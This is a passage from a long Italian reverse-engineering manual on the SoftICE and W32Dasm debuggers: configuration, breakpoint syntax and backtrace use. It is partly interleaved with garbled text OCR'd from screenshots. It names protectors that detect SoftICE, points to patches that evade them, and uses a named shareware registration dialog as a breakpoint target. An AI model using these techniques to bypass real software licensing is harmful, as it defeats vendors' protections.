legati al capture delle immagini video e quindi non permette di eseguire 
hardcopy. 

Un programma particolare è il loader che crea alcune tabelle, nel caso di 
sorgenti disponibili, e legge il software in memoria. 

Questo loader può essere anche inutile anche perchè, come ho detto prima, il 
debugging può avvenire in qualsiasi istante tramite la pressione dei tasti 
CTRLD. 

SI mostra al momento dell’attivazione il nome del modulo proprietario del codice 
mostrato nell’istante in cui compare. 

Alcune volte le informazioni sono quelle relative al suddivisore del tempo di 
Windows. 

Le opzioni che permettono di settare certi tipi di breakpoint in genere 
permettono di specificare l’handle della finestra o il nome del modulo a cui ci 
si vuole riferire. 

SI dispone di molti comandi atti a fornire informazioni dettagliate sui moduli 
attivi. 

Inoltre al potenza di SI, come vedremo, è legata ai breakpoint. 

Le principali possibilità di SI sono le seguenti. 


e Breakpoints in realtime legati alla lettura/scrittura nella memoria 

e Backtrace history 

e Debugging a livello simbolico e di sorgente 

e Ambiente che può lavorare con debugger esistenti 

e Supporto completo EMM 

e Finestra di lavoro popup che può comparire in qualsiasi istante 

e Metodologia che protegge SI da programmi che creano problemi 

e Possibilità di usare SI come debugger stand-alone. Questa possibilità è usata 
per debuggare device driver, interrupts handlers o sequenze di boot. 


SoftIce fà paura alle case che creano software destinati alle protezioni tanto 
da avergli inserito all’interno di tali moduli dei sistemi che controllano la 
sua presenza. 
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La paura comunque è abbastanza relativa in quanto le potenzialità di SI sono 
proporzionali alle difficoltà d’uso. 
SI potrei definirlo un debugger di sistema invece che di programma. 
Quando carico un certo programma sotto TurboDebugger o sotto debugger Microsoft 
il disassemblato mostrato è appunto relativo a questo. 
SoftIce invece mostra il codice del programma ma non solo. 
Se il CTRL-D che lo attiva viene dato in un momento in cui è in esecuzione un 
pezzo di codice di qualche task differente questo viene mostrato nella porzione 
di video relativo al codice. 
Stessa cosa dicasi per i breakpoint. 
Se io abbino ad un breakpoint un certo tipo di messaggio (WM_ PAINT, 
WM_INITDIALOG ecc.) l'interruzione del codice avverrà in occesione di qualsiasi 
WM_PAINT o WM_INITDIALOG capitato nel sistema e non solo relativo al processo da 
noi voluto. 
Per limitare i processi controllati dovremo utilizzare ulteriori selettori nella 
riga di attivazione del breakpoint come ad esempio l’handle della window, l'ID 
del TASK, l’ID del processo e così via. 
Queste informazioni dovremo ricavarle mediante le funzioni informative di SI 
oppure dovremo ricavarle con utilities esterne. 
Se un comando di SI gestisce come sintassi un handle, un ID ecc. allora 
sicuramente ci sarà un comando che permetterà di cercarlo e visualizzarlo. 
In ogni caso la gestione di un debugger come questo è sicuramente più potente di 
altri ma è anche più complicata tanto che spesso viene preferito WDASM che a 
livello di tipologie di breakpoints e funzioni condizionali è meno potente ma 
quello che ha è controllabile a vista con pulsanti e tutte le informazioni 
visibili sono tutte inserite in finestre mostrate a video. 
Con SI ci troveremo spesso a dover richiedere la visualizzazione di informazioni 
che dovranno essere segnate su fogli per non dimenticare i dati. 
Questi dati dovranno successivamente essere utilizzati in altri comandi. 
Le funzioni eseguibili con il mouse sono nulle, almeno fino alla versione 3.25. 
Anche funzioni di visualizzazione delle informazioni in SI è più complicata 
rispetto a WDASM ed in ogni caso sono tutte legate a sequenze di comandi 
testuali che bisogna dare. 
WDASM sicuramente darà più soddisfazioni inizialmente però ci si accorge presto 
che è più instabile. 
WDASM spesso segnala errori legati ai threads o similia che sono dovuti al 
compito sicuramente ingrato che si trova dinanzi a certi programmi di grosse 
dimensioni. 
Poi ricordiamoci che uno è in particolar modo un disassemblatore con funzioni di 
debugger mentre l’altro è un debugger puro. 
Che differenza c’è ? 
Nel primo caso il programma viene preso ed analizzato al fine di tentare di 
ricostruire i riferimenti ecc. 
Il secondo, il debugger, invece interpreta direttamente le istruzioni del 
programma che vanno al processore senza prima leggere completamente il programma 
e senza tentare di ricostruire le symbols table. 
Caricando un programma con WDASM 
vedete chiaramente che esegue 


EN URSoft W32Dasm Yer 8.9 Program Disassembler?D eb diverse passate SH quanto ha letto. 
rr nai ar Dopo la prima fase di analisi WDASM 
| ssembler Project Debug Search Goto Execute Text ha creato le varie tabelle e il 


listato in assembler. 

Se ad un certo punto lo si vuole 
debuggare allora lo si deve leggere 
in memoria con l'apposita opzione. 
Se il programma è molto grosso si 
possono incontrare problemi nella fase di rigenerazione del codice assembler. 

Le prime versioni di WDASM rigeneravano solo i sorgenti in assembler e non 
eseguivano un debugging dinamico. 

Spesso i sorgenti ricreati dalle vecchie versioni di WDASM avevano un utilità 
educativa in quanto per se stessi i sorgenti non si potevano neppure ricompilare 
o perchè troppo grossi o perchè contenevano costruitti non identificabili da 
WDASM. 


Open File to Disassemble.. fa II 


[dat ALI 


Fave DisassembiieziAe end cate Frotecthile 


Pagina 357 di 991 


La “disassemblazione” di un programma di 500 Kbytes a volte creava sorgenti .ASM 
di 20 Mbytes cosa che faceva “ridere” il compilatore non appena li vedeva. 
Dicevamo che SI fa paura ai softwaristi che creano protezioni. 

I seguenti protettori identificano softice. 


EEXE (Encrypt Exe - FZC.EXE) 

HACKSTOP (WWPACK.EXE) 

PROTECT! (in vari files) 

GUARDIAN ANGEL (HWINFO.EXE) 

EXELITE (exe-compressor polacco) 

PREDATOR 666 (DCA.EXE v1.4) 

DS-CRP by Dark Stalker (hi!) 

SECURE v0.19 dall’autore di WWPACK 

ALEC v1.5 (il miglior protettore) by Random 


Ma come al solito fatta la legge trovato l’inganno. 

Ogni programma di protezione dispone di una metodologia sua per 
l’identificazione di SoftIce per cui esistono patch che cambiando il MagicNumber 
e altre cose permettono a SoftIce di non essere identificato. 

Molti programmi mandano in CRASH SoftIce usando l'interfaccia dell’INT 3 o altri 
interrupts oscuri (INTO1/ICEBP, INTOG, INTO7, INTO8). 

Ad esempio la seguente sequenza di istruzioni permette di sapere se SI è 
installato. 


mov ebp, "BCHK" 

mov ax,4 

int 3 

cmp ax,4 

jne winice_installed 


I files per eseguire le patchs li trovate cercando su Astalavista i lavori fatti 
da 


Greetings from the SoftICE 3.0 (Godot) team! 
Dom Basile 

Wizard extraordinaire Tom Guinther 

Symbol engine, loader Dan Babcock 

Symbol engine Gerald Ryckman 

Win95 porting & debugging Ray Hsu 

Video & mouse support Carol Tyler 


SoftIce possiede, come ho già detto prima, moltissimi breakpoints che possono 
essere utilizzati per diversi scopi. 

Una cosa particolare di SoftIce è il buffer per il backtrace. 

Mediante opzioni destinate alla creazione di breakpoint è possibile inserire 
delle istruzioni in questo buffer e successivamente eseguirle step by step. 
Cercate su internet i seguenti files i quali costituiscono degli ottimi manuali 
legati a SoftIce. 


SI-UG--1 TXT 290.729 11/08/99 19.05 si-ug-chapter01.txt 
SI-UG--2 TXT 8.154 11/08/99 11.16 si-ug-chapter02.txt 
SI-UG--3 TXT 39.034 11/08/99 11.17 si-ug-chapter03.txt 
SI-UG--4 TXT 21.710 11/08/99 11.20 si-ug-chapter04.txt 
SI2234-1 TXT 5.970 11/08/99 11.12 si-ug-chapter10.txt 
SI225A-1 TXT 10.375 11/08/99 11.20 si-ug-chapter08.txt 
SI2634-1 TXT 14.241 11/08/99 11.13 si-ug-chapterl1.txt 
SI264A-1 TXT 74.827 11/08/99 11.17 si-ug-chapter05.txt 
SI265A-1 TXT 6.209 11/08/99 11.20 si-ug-chapter09.txt 
SI2A34-1 TXT 28.175 11/08/99 11.09 si-ug-chapter12.txt 
SI2A4A-1 TXT 14.645 11/08/99 11.09 si-ug-chapter06.txt 
SI2E34-1 TXT 40.830 11/08/99 11.08 si-ug-chapter13.txt 
SI2E4A-1 TXT 14.811 11/08/99 11.13 si-ug-chapter07.txt 
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Sono 13 capitoli suddivisi per argomentazioni. 

SI disponbe inoltre della possibilità di essere eseguito con altri debugger 
quali CODEVIEW o altri. 

Nei files precedenti viene trattato anche questo argomento. 

Partiamo ora dall'inizio. 

SI dispone di un certo numero di parametri che permettono di settare l’ambiente 
operativo come ad esempio il numero di linee, la larghezza del video, il tipo di 
finestre aperte ecc. 

I tasti funzione possono essere abbinati a sequenze di comandi tramite funzioni 
che possono essere inserite, insieme ai comandi appena detti, nel file di 
inizializzazione WINICE.DAT 

Il seguente è un file in cui sono presenti i parametri iniziali che uso io. 


NMI=ON 
SIWVIDRANGE=ON 
LOWERCASE=0FF 
MOUSE=ON 
NOLEDS=0FF 
NOPAGE=0FF 
PENTIUM=ON 
THREADP=ON 
VERBOSE=ON 


PHYSMB=32 
SYM=1024 
HST=256 
DRAWSIZE=2048 
TRA=8 


INIT="LINES 40;WIDTH 80;set FONT 3;X" 


F1="h; " 
F2="/Awr;" 
F3="/src;" 
F4="Ars;" 
F5="/x; " 
F6="/ec;" 
F7="Ahere;" 
F8="At; " 
F9="/Abpx;" 
F10="Ap;" 


F11="/G @SS:ESP;" 
F12="/p ret;" 
SF3="Aformat;" 


CF8="AXT;" 
CF9="TRACE OFF;" 
CF10="AXP;" 


CF11="SHOW B;" 
CF12="TRACE B;" 


AF1="/wr;" 
AF2="/wd;" 
AF3="/wc;" 
AF4="/ww;" 
AF5="CLS;" 
AF8="AXT R;" 


AF11="/Add dataaddr->0;" 

AF12="/Add dataaddr->4;" 

CF1="altscr off; lines 60; wc 32; wd 8;" 
CF2="Awr;/wd;/wc;" 


EXP=C : \PROGRAMM\MAUISO-1\TIMESL-1.EXE 
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WDMEXPORTS=ON 
MONITOR=0 
; WINICE.DAT 
; (SIW95\WINICE.DAT) 
; for use with SoftICE Version 3.2 (Windows 95) 
; 14 July 1997 
3 KEKKKAKKAKKAKAKAKKAKKAKKAAKKAKKKAAKKKAKKKAKAKKAKKAKKAAKKAAKKAKKAKAKKAKKAKKAKAKKAKKAKKAAKKAAKKAKKAKAKKAKKAKAKKAKKAKAKAA 
7 If your have MORE than 32MB of physical memory installed, change 
; the PHYSMB line to the correct # of Megabytes. 
7 If you have LESS than 32MB you can save a bit of memory by 
; specifying the correct # of Megabytes 
; KEKKKAKKKKAKKAKKKAKAKKAKKAKKAAKKKAKKKAKAKKKAKKAKKAKKAKKAKKAKAKKAKKAKKAKAKKAKAKKAKKAAKAKKAAKKAKKAKAKKAKKAAKKAKKAKAKA 
; ***** Examples of sym files that can be included if you have the SDK ***** 
5 Change the path to the appropriate drive and directory 
;LOAD=c:\windows\system\user.exe 
;LOAD=c:\windows\system\gdi.exe 
; LOAD=c:\windows\system\krnl386.exe 
;LOAD=c:\windows\system\mmsystem.dll 
;LOAD=c:\windows\system\win386.exe 
; ***** Examples of export symbols that can be included ***** 
Di Change the path to the appropriate drive and directory 
;EXP=c:\windows\system\vga.drv 
;EXP=c:\windows\system\vga.3gr 
;EXP=c:\windows\system\sound.drv 
;EXP=c:\windows\system\mouse .drv 
;EXP=c:\windows\system\netware.drv 
;EXP=c:\windows\system\system.drv 
;EXP=c:\windows\system\keyboard.drv 
;EXP=c:\windows\system\toolhelp.dll 
;EXP=c:\windows\system\shell.dll 
;EXP=c:\windows\system\commdlg.dll 
;EXP=c:\windows\system\olesvr.dll 
;EXP=c:\windows\system\olecli.dll 
;EXP=c:\windows\system\mmsystem.dll 
;EXP=c:\windows\system\winoldap .mod 
;EXP=c:\windows\progman.exe 
;EXP=c:\windows\drwatson.exe 

***** Examples of export symbols that can be included for Windows 95 ***** 
; Change the path to the appropriate drive and directory 
EXP=c:\windows\system\kernel32.dll 
EXP=c:\windows\system\user32.dll 
EXP=c:\windows\system\gdi32.dll 
EXP=c:\windows\system\comdlg32.dll 
EXP=c:\windows\system\shell32.dll 
;EXP=c:\windows\system\advapi32.dll 
;EXP=c:\windows\system\shell232.d1l1l 
;EXP=c:\windows\system\comct132.dll 
;EXP=c:\windows\system\crtdll.dll 
;EXP=c:\windows\system\version.dll 
;EXP=c:\windows\system\netlib32.dl1l 
;EXP=c:\windows\system\msshrui.dll 
;EXP=c:\windows\system\msnet32.dll 
;EXP=c:\windows\system\mspwl32.dll 
;EXP=c:\windows\system\mpr.dll 


Una parte di SI viene letta mediante linea di comando oppure inserendo 
l’istruzione che lo lancia dentro all’autoexec.bat. 

Premendo CTRL-D, se non sono stati cambiati i tasti, viene attivata la finestra 
in cui compaiono i dati. 

Questo può avvenire in qualsiasi istante. 
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Se si vuole leggere il 
codice di un programma 
è possibile farlo dal 
programma 


* C:\Programmi\COMExp\comexp.exe - Symbol Loader 
File Edit Module Help 


Firecostioaderso ore Mi i] ef a zie 


Loader32 mostra La |CProgrammi\COMExp\comexp.exe opened successfully 


seguente finestra. Error: Unknown error 
Bisogna sempre tener Translating C:xProgrammitCOMExp\comexp.exe. .. 


Error: No debug information found 
presente . che SI Loading module C:AProgrammitCOME«p\comexp.exe. .. 
permette di d e buggar € Module C:\Programmi\COMExp\comexp.exe successfully loaded 
anche programmi con i 


sorgenti a 

disposizione anche se 

nel nostro caso questa 

possibilità non si 

verifica mai. | | 
Questo era per dire 
che molte funzioni 
disponibili nei menu 
del loader sono relativi a programmi che dispongono dei sorgenti. 

Lo scopo del loader è fondamentalmente quello di trasformare il programma in 
informazioni simboliche. 

Noi lo utilizzeremo fondamentalmente per leggere il programma in memoria tramite 
il secondo pulsante della toolbar. 

I comandi inseriti dentro ai tasti funzione possono essere settati tramite 
apposito comando. 

Questo è lo stesso che permette di visualizzare il settaggio attuale. 


SoftICE is active 4 


FKEY 


Lista i comandi. 
Possono essere settati anche i tasti funzione con i vari SHIFT, CTRL, ALT ecc. 
Il settaggio avviene con 


FKEY tasto Fx funzione 


La più grossa potenzialità di SI comunque rimangono i breakpoints. 

SI dispone di beakpoint che generalmente sono disponibili soltanto in debugger 
hardware. 

Per fare questo vengono sfruttate delle potenzialità dei chip 80386 e fratelli 
maggiori. 

Possono essere settati breakpoint su letture e scritture in memoria, esecuzione 
di interrupts, lettura e scrittura di porte di I/0 ecc. 

Ogni breakpoint viene, una volta creato, identificato da un numero il quale 
potrà essere utilizzato nelle varie funzioni adatte ad attivarlo e a 
disattivarlo, a cancellarlo o a modificarlo. 

Il numero massimo è di 16 breakpoint contemporaneamente. 

Breakpoint specifici ad indirizzi particolari possono essere settati 
semplicemente clickando sulla linea di programma interessato o specificando 
l’indirizzo della linea come argomento del comando di creazione. 

I breakpoints possono essere abbinati ad un contatore che dice quante volte il 
breakpoint deve essere ignorato prima di essere considerato (count). 

Il primo comando per la creazione d breakpoint è 


BPM[SIZE]address[verb][qualifier value][C=count] 
BPMW 
BPMD 
BPMB 
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La SIZE o dimensione può essere (B)yte, (W)ord, (D)oubleword. 

Questo parametro serve ad indicare il range coperto dal breakpoint. 

Se ad esempio viene usato il (D)oubleword e il terzo byte dell doubleword viene 
modificato allora il breakpoint viene attivato. 

I VERB sono le operazioni di lettura, scrittura ecc. e precisamente: 


|R, RW, Wo X 


I QUALIFIER sono 


(EQ)ual, (NE)not equal, (GT)greater than, (LT)less than, (M)ask 


Il VALUE invece è la word, il byte ecc. a seconda della SIZE. 

Questo comando viene appunto utilizzato per il settaggio di beakpoint legati a 
letture, scritture o esecuzioni di memoria. 

Il VERB X, per chi conosce Unix sa che X stà per esecuzione, permette di 
bloccare il programma quando viene eseguita qualche istruzione presente ad un 
certo indirizzo. 

Normalmente CS:IP puntano all'istruzione successiva a quella eseguita. 

Se viene utilizzato il VERB X allora CS:IP puntano all'istruzione che ha 
generato il BP. 

Guardate il seguente esempio: 


BPM 0040:SI W EQ 10 C=3 


Si tratta di un BP legato all’accesso in memoria. 

La terza volta che il valore 10 viene scritto nella locazione 0040:SI fa 
generare il BP. 

Un altro sempio. 


BPM CS:1234 X 


La prima volta che viene raggiunto in esecuzione l’indirizzo cs:1234 fa bloccare 
il programma sul BP. 
Un altro esempio utilizzate la MASK. 


BPMW DS:F00 W E M 0XXX XXXX XXXX XXX1 


Si tratta di un BP di size settata a W (word breakpoint) legato allaq scrittura 
in memoria. 

Il BP interviene la prima volta che la locazione CS:F00 ha un valore scritto il 
quale setta il bit di ordine maggiore a 0 e quello di ordine minore a 1. 

Gli altri bits possono essere qualsiasi valore. 

Volendo settare un BP in modo tale che il programma si interrompa la prima volta 
che ad un certo indirizzo viene scritto un valore maggiore di 5, dobbiamo 
specificare il seguente comando 


BPM DS:1000 W GT 5 


Un famiglia di comandi permette invece di specificare dei range di indirizzi. 
Lo stereotipo di questi comandi è 


BPR start-address end-address [verb] [C=count] 


COUNT come nei casi precedenti indica dopo qante volte deve essere attivato il 
BP. 
Il VERB può essere 


(R)ead, (W)rite o (RW)read/write 
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Due parametri aggiuntivi sono T e TW i quali, se specificati, non fanno eseguire 
il BP ma abilitano il BACKTRACE sul range specificato. 


BPR B000:0 B000:1000 W 


Il precedente esempio abilita il BP se viene eseguita la scrittura nel buffer 
del video monocromatico. 

SI può collezionare le informazioni relative alle istruzioni in un backtrace 
buffer. 

Questo possibilità permette di eseguire a ritroso delle istruzioni precedenti ad 
un BP. 

Il range può variare da un byte ad 1 Mbytes. 

Ricordatevi che questa possibilità degrada le prestazioni in misura tanto 
maggiore quanto maggiore è il range specificato. 

Un esempio per inserire nel backtrace buffer è il seguente 


BPR 1000:0 2000:0 T 


Altri BP possono essere settati su porte di I/0. 


BPIO port [verb] [qualifier value] [C=count] 


Il VERB può essere (R)ead, (W)rite o (RW)read/write. 
Il QUALIFIER può invece essere come nel caso del tipo di BP precedenti 


(EQ)ual, (NE)not equal, (GT)greater than, (LT)less than, (M)ask 


Un esempio può essere 


BPIO 21 W NE FF 


BP in scrittura sulla porta 21 se il valore NON E’ UGUALE a FF. 
Anche per gli interrupts possono essere settati breakpoints specifici. 
La sintassi 


BPINT int-number [<AL|AH|AX>=value][C=count] 


Un esempio che setta un BP sull’INT 21 con AH=4C (ricordate che nel caso 
dell’int del DOS 21h AH contiene il codice del servizio) è il seguente. 


BPINT 21 AH=4C 


BPX invece permette di settare BP in esecuzione. 


BPX address [C=count] 


SI quando viene attivato crea delle tabelle con gli indirizzi delle funzioni 
importate. 

Ad esempio se date il comando EXP in SI avrete la lista delle funzioni 
exportate. 

Questa lista ha la seguente parvenza 


0045:1234 GETDLGITEMTEXT 0056:8900 FATALEXIT 
0034:3333 GETWNTEXT 0456:9999 ANOTHERFUNCT 


Come potete vedere SI vi mostra le funzioni abbinate ad indirizzi. 

Se desiderate bloccare il programma ogni volta che viene richimata la funzione 
GetDlgItemText potete specificare l’indirizzo segnato a fianco, dopo averlo 
visto con EXP, oppure potete specificarlo in modo simbolico con il comando 
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BPX GetblgItemText 


SI userà l’indirizzo abbinato. 


Chiaramente il simbolo CIAVEZI COM Explorer 1.52 x [x] 
esistere se non vi viene 
segnalato un messaggio di symbol COM Explorer 1.52 


not defined. 
Parlando di €Windowus.@ esistono 
anche messaggi che potete listare 


Copyright © 1997-1999 4Developers LLC. 


mediante il comando : Thank you for trving COM Explorer. 
This is an UNREGISTERED Version which will expire after 
30 days. The registered version does not display this 
WMSG i rd 
message and is not limited in any way. 


Se volete inserire un breakpoint 
su un certo messaggio potete REGISTER Online and receive the registration code to 
usare il comando : remove all limitations. 


If you have registered COM Explorer type in the user name 
and registration code and click the 'Unlock' button. This will 
remove all limitations. 


Il carattere jolly * può essere ia 

usato nel comando di lista :[UNREGISTERED USER 

messaggi come lo usereste con il Registration Code: 

dos facendo una dir. È [UNREGISTERED USER Unlock | 
WMSG WM_S* in i il if OrderOnline Skip This | 


Il precedente esempio vi 

listerebbe tutti i messaggi che 

iniziano con WM_S. 

Il comando BMSG possiede la possibilità di specificare anche l’handle della 
finestra su cui è indirizzato il messaggio. 

Il comando HWND lista gli handloe delle finestre del programma. 

Specificando 


BMSG WM_INITDIALOG 


BMSG WM_INITDIALOG 


Si richiede di 
bloccare il programma 
tutte le volte che 


viene chiamato Magi Message Options R x] 
WM_INITDIALOG 


Windows | Messages Output 


indipendentemente 00000-iillee 
dalla finestra. Window Finder Tool Selected Object 
c sii 13 i do di Drag the Finder Tool over a Window: 0000073C 
iMentericare la window to select, then Text "COM Explorer 1.52" 

release the mouse button. : : 
finestra interessata è cer #32770 [Dialog] 
possibile specificare sE Style: 34C800C4 
quel valore come [i Rect (495, 243)(854, 596) 359x353 
parametro. Thread ID: FFF4A&4C7 
Supponiamo che nel T Hide Spy++ Process ID: FFF4915F 
sistema sia. in | Additional Windows 
esecuzione la finestra I : x 
mostrata qui a fianco I" Parent T Windows of Same Thread T dll'windows in System 
appartenete ad un TT Children M Windows of Same Process 
programma shareware 


distribuito da molte IT Save Settings as Default 
riviste nazionali. 


Cancel | Help | 
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SI a seguito del cmando HWND mostra i seguenti dati 


Window handle hQueue SZ qowner Class name Window-proc. 
0080 196F 32 COMEXPL ComboBox 140F : 000045678 
0086 19F6 32 COMEXPL #32700Dialog 140F :000034344 


Se grazie a qO0wner e a class-name riuscite a identificare la dialog che vi 
interessa potete dare: 


BMSG 0080 WM_INITDIALOG 


In questo modo intercettate il messaggio di INITDIALOG indirizzato a quella 
dialog specifica. 

Non riuscendo tramite HWND potete posizionarvi sulla dialog con il cursore 
movibile di Spy++ e ricavarne l’handle. 

Le informazioni necessarie per settare il BP vengono mostrate in Spy++ (a parte 
il fatto che a noi interessa in particolar modo la prima ovvero quella a fianco 
a Window). 

La sintassi del BP che permette di intercettare i messaggi indirizzati ad una 
window è 


BMSG hwnd [L] [begin msg [end msg]] [IF expression] 


E’ possibile intercettare tutti i messaggi indirizzati ad una window 
specificando solo l’handle della finestra, quello visto con Spy++ o rintracciato 
con il comandeo WMSG. 

Chiaramente debuggare il programma con un breakpoint su una finestra senza 
filtrare i messaggi diventa problematica visto che il tutto si interromperebbe 
in ogni istante a seguito di WM_PAINT, WM_ERASEBKGND ecc. 

Inoltre la cancellazione della client area del programma grazie alla comparsa 
del debugger creerebbe messaggi a catena per cui sarebbe meglio selezionare 
quali messaggi intercettare. 

Non sapendo quali sono quelli inviati alla finestra si potrebbe fare un ciclo 
per vedere quali sono generati sulla finestra e successivamente abilitare solo i 
breakpoint sui messaggi più interessanti. 

Quando si usa Spy++ ci si deve ricordare che è anche possibile cercare di avere 
gli handle delle windows inserite nella dialog stessa come ad esempio quelli dei 
campi d’edit. 

In altre parole potrei cercare gli ID dei campi d’edit e usare come breakpoint 
questi. 

In questo modo avrei la possibilità di vedere se esistono messaggi specifici 
legati a questi campi. 

In caso negativo potrei ampliare successivamente il campo cercando di 
intercettare i messaggi indirizzati a tutta la dialog. 

Quando non esistono messaggi come GetDlgItemText o GetDlgItemInt è facile che la 
lettura dei campi avvenga con l’intercettazione dei messaggi WM_GETTEXT. 

Per cui, supponendo che l’handle del campo d’edit sia 0BC4, è possibile settare 
un breakpoint con 


BMSG 0BC4 WM_GETTEXT 


Con i breakpoints bisogna ricordarsi che l’indirizzo può essere specificato in 
modo dinamico semplicemente usando il registro puntatore all’istruzione EIP. 

In altre parole invece di usare un indirizzo fisso, bpx 0040ffff, è possibile 
usare eip, magari con qualche condizione. 


BPX EIP IF(EAX==25) 


Un particolare tipo di BP permette di interrompere l’esecuzione se il valore di 
CS:IP esce dal range specificato. 
La sintassi è 
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CSIP [OFF| [NOT] start-address end-address] 


Se ad esempio vogliamo bloccare l’esecuzione se l’indirizzo in esecuzione non è 
dentro al ROM BIOS 


CSIP NOT F000:0 FFFF:0 


I comandi per il listing, l'abilitazione e la disabilitazione dei BP la potete 
trovare all’inizio quando ho ripportato la lista comandi di SI. 


Riassumendo quanto abbiamo detto sui breakpoints possiamo raggrupparli in 


e Breakpoints in esecuzione: SI sostituisce un istruzione esistente con INT 3. 
Bisogna utilizzare il comando BPX per settare questo tipo di BP. 


e Breakpoints di memoria: SI utiulizza i registri del x86 di debug per 
interrompere quando alcuni byte/word/dword di memoria vengono lette, scritte 
o eseguite. Il comando BMP viene usato per questo scopo. 


e Breakpoints su interrupts: SI intercetta gli interrupts modificando la IDT 
(Interrupt Descriptor Table). Viene usato BPINT per settare questo tipo di 
BP. 


e Breakpoints di 1/0: SI utilizza delle estensioni del Pentium/Pentium Pro 
presenti in registri per attendere le istruzioni di IN e OUT su porte. Il 
comando per creare il BP è BPIO. 


e Breakpoints su messaggi di Windows: SI intercetta i messaggi di Windows. La 
creazione avviene con BMSG. 


Grazie al comando DO è possibile creare delle seugqenze di comandi di SI che 
vengono eseguiti quando il BP viene attivato. 

Nella specifica DO possono essere inseriti tutti i comandi di SI. 

Ad esempio: 


BPX EIP DO “dd eax” 
BPX EIP DO “data 1;dd eax” 
BPMB dataaddr if (byte(*dataaddr)==1) do ‘“? IRQL” 


I breakpoints possono essere anche condizionali grazie aqlla seguente sintassi: 


BREAKPOINT_COMMAND [options] [IF conditional expression] [DO “commands”] 


SI possiede il comando THREAD che mostra i threads attivi. 
Grazie ai comandi relativi ai breakpoints condizionali è possibile attendere 
l’attivazione di un thread o la sua disattivazione. 


Bpx ntoskrnl!SwapContext IF (edi==0xFF8B4020) 
Bpx ntoskrnl!SwapContext IF (esi==0xFF8B4020) 


Esistono alcuni caratteri che permettono di specificare valori dinamici dentro 
agli statement dei breakpoint. 

Si tratta del carattere underscore ‘’_’ il quale permette di vedere il valore 
dinamico di un oggetto. 

Ad esempio 


bpx eip IF (eax == _eax) 


è l'equivalente di 
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? eax 
00000012 ; ATTENZIONE CHE QUESTO E’ IL VALORE STAMPATO DAL COMANDO ? 
bpx eip IF (eax == 12) 


In pratica setta un breakpoint condizionale che viene attivato se il valore 
dinamico di eax è uguale al suo corrente valore. 
Un altro esempio: 


bpint 2E if (process == _process) 


o ancora 


bpx eip IF (tid == _tid) 


che sarebbe equivalente a 


? tid 
8 ; ATTENZIONE CHE QUESTO E” IL VALORE STAMPATO DAL COMANDO ? 
bpx eip if (tid == 8) 


Nei primi capitoli abbiamo parlato di concetti legati allo stack anche se i 
comandi di visualizzazione di SI non sono soltanto destinati alla 
visualizzazione di questa. 

Spesso si inseriscono breakpoints in corrispondenza di chiamate a funzioni 
durante le quali è importante tenere sotto controllo i valori dello stack o di 
certi dati particolari in zone di memoria di cui si conosce l'indirizzo oppure 
casi in cui questo è memorizzato dentro a registri. 

I vari comandi DW, DB ecc. possono ricevere come argomenti anche i nomi dei 
registri. 


DB ESP+04 
DW EBP 


Una caratteristica di SoftIce è quella legata alla possibilità di utilizzare il 
buffer di backtrace. 

SI può inserire le istruzioni in un buffer di backtrace e visualizzarle a 
seguito di un certo avvenimento. 

Ad esempio potrebbe visualizzare le istruzioni a seguito di un bug anche se a 
noi inetressano altre casistiche. 

Le informazioni sulle istruzioni vengono collezionate a seguito di accessi in un 
range specifico di memoria. 

Questo range può essere da 1 byte a 1 Mbyte. 

Il salvataggio delle istruzioni non avviene automaticamente in quanto farlo 
rallenterebbe notevolmente il sistema. 

Per poter utilizzare questa possibilità bisogna inanzi tutto allocare un buffer 
per poterci salvare le istruzioni. 

Generalmente un buffer di backtrace di 10 Kbytes viene allocato di defaults. 

Il passo successivo è quello di abilitare questo buffer creando un breakpoint 
legato ad un range di memoria utilizzando il VERB T o TW. 

Ad esempio 


BPR 1000:0 2000:0 T 


Come avevo già accennato i VERB T e TW non causano l'interruzione del programma 
ma semplicemente inseriscono le istruzioni nel buffer di backtrace. 

Dopo aver inserito agnche gli altri breakpoints è necessario uscire da SI con il 
comando X. 

Al primo breakpoint SI verrà visualizzato e quindi potremo richiedere la 
visualizzazione delle istruzioni inserite nel buffer con il comando 
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SHOW n-istruzioni 


Dove n-istruzioni è chiramente il numero di linee di istruzione che si desidera 
visualizzare. 

Per rieseguire una serie di istruzioni bisogna prima entrare nel modo di trace 
con : 


TRACE n-istruzioni 


Dopo essere entrati nel modo di trace con il precedente comando è possibile 
rieseguire le istruzioni tramite i comandi: 


XT, XP o XG. 


La partenza avviene dall’istruzione specificata dal comando trace. 

Se casualmente è stato specificato il comando TRACE 50 i comandi precedenti 
partono dalla 50 istruzione. 

Per terminare il modo di trace è sufficente utilizzare la specifica OFF del 
comando. 

Durante questa fase quasi tutte le istruzioni di SI funzionano normalmente. 

I comandi di manipolazione dei breakpoints non necessitano di spiegazioni 
particolari. 

I breapoints compaiono in una lista che viene mostrata mediante il comando BL. 
La cancellazione avviene con BC (BREAKPOINT CLEAR) seguito dal numero del BP 
oppure dal carattere jolly * se si vogliono cancellre tutti. 

La disabilitazione temporanea avviene con BD mentre la riabilitazione con BE. 
Dicevo prima che SI dispone di un loader che però offre potenzialità nel caso in 
cui si esegua il debug di programmi con i sorgenti. 

SI, essendo attivabile con la pressione di CTRL-D (o quelli che si sono 
settati), può essere attivato in qualsiasi istante. 

Avevo accennato prima che la metodologia di scrittura degli interrupt permette 
di espandere le funzioni di SoftIce. 

Quando avevamo parlato di Interrupts avevamo detto che a partire dall’indirizzo 
0 c’erano 1024 bytes (256 * 4) destinati a mantenere memorizzati gli indirizzi 
dei 256 possibili interrupts. 

SoftIce possiede un istruzione che permette di assemblare istruzioni in 
assembler. 

Se a questo punto scrivessimo una qualche funzione in assembler con la 
metodologia di scrittura degli interrupts e inserissimo il suo indirizzo dentro 
alla tabella dei vettori d’interruzione assegnandogli il numero 99, per esempio, 
avremo poi la possibilità di richiamarla mediante il comando di generazione 
interrupt di SI. 

Queste ‘funzioni scritte in SI potrebbero inoltre essere abbinate a qualche 
comando come ad esempio quelli relativi ai breakpoints. 

Supponiamo di voler eseguire una serie di controlli sui valori dei registri. 
Vediamo di trovare una zona di memoria libera e codifichiamo in assembler le 
linee di programma nelle quali eseguiremo il controllo dei registri. 

La funzione verrà scritta con la metodologia degli interrupt per cui verrà 
controllato il primo registro e se il valore non corrisponde verrà eseguito un 
salto sull'istruzione di ritorno dall’interrupt IRET se non verrà controllato il 
secondo registro e così via. 

Il comando per assemblare è A seguito dall’indirizzo. 


A 9000:0 
9000:0 CMP AX,3 j primo registro da controllare 
9000:4 JNE 34 7 se non è uguale a quello che vogliamo ritorna 
9000:10 CMP BX,4 7 secondo registro 
9000:14 JNE 34 7 se non è uguale a quello che vogliamo ritorna 
9000:20 CMP CX,5 ; terzo registro 
